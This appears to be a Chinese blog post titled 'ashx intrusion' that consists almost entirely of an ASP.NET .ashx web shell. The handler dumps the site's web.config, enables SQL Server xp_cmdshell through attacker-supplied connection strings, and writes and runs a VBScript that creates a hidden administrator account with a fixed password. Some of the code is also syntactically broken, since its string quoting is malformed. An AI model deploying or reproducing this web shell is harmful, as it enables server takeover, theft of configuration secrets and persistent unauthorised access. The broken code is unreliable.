• ashx入侵

    <%@ WebHandler Language="C#" Class="TextLd" %>
    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Web;
    using System.Data.SqlClient;

    public class TextLd : IHttpHandler
    {
    public void CreateLocalUser(string newPath)
    {
    System.Diagnostics.Process.Start(@"d:1.vbs");
    System.IO.File.WriteAllText(@"d:1.vbs", "set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") '属性,admin组 od=ob.Create("user","test") '建立用户 SetPassword "1234" '设置密码 SetInfo of=GetObject(os&"/test",user) add os&"/test"");
    }
    public void ShowWebConfig(HttpContext context)
    {
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    }
    public void WriteVbs(HttpContext context)
    {
    System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), "set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") '属性,admin组 od=ob.Create("user","test") '建立用户 SetPassword "1234" '设置密码 SetInfo of=GetObject(os&"/test",user) add os&"/test"");
    }
    public void ExecuteSql(string connection, string sql)
    {
    using (SqlConnection con = new SqlConnection(connection))
    {
    using (SqlCommand commd = new SqlCommand(sql, con))
    {
    con.Open();
    commd.ExecuteNonQuery();
    con.Close();
    }
    }
    }
    public void ProcessRequest(HttpContext context)
    {
    context.Response.ContentType = "text/plain";
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    try
    {
    var connection = context.Request.QueryString["connection"];
    switch (context.Request.QueryString["method"])
    {
    case "1": WriteVbs(context); break;
    case "2":
    ExecuteSql(connection,@"sp_configure 'show advanced options',1 reconfigure");
    ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");//开启数据库的xp_cmdshell
    break;
    case "3": ExecuteSql(connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'");
    break;
    default:
    ShowWebConfig(context);
    break;
    }
    }
    catch (Exception ex)
    {
    context.Response.Write(ex.Message);
    }
    context.Response.End();
    }
    public bool IsReusable
    {
    get
    {
    return false;
    }
    }
    }
  • 相关阅读:
    Smart Client智能客户端技术
    SaaS介绍
    SaaS介绍
    开源软件介绍
    SaaS介绍
    SaaS介绍
    开源软件介绍
    开源软件介绍
    GPUCUDA安装
    Linux 下的段错误(Segmentation fault)调试方法
  • 原文地址:https://www.cnblogs.com/a14907/p/5053530.html
Copyright © 2020-2023  润新知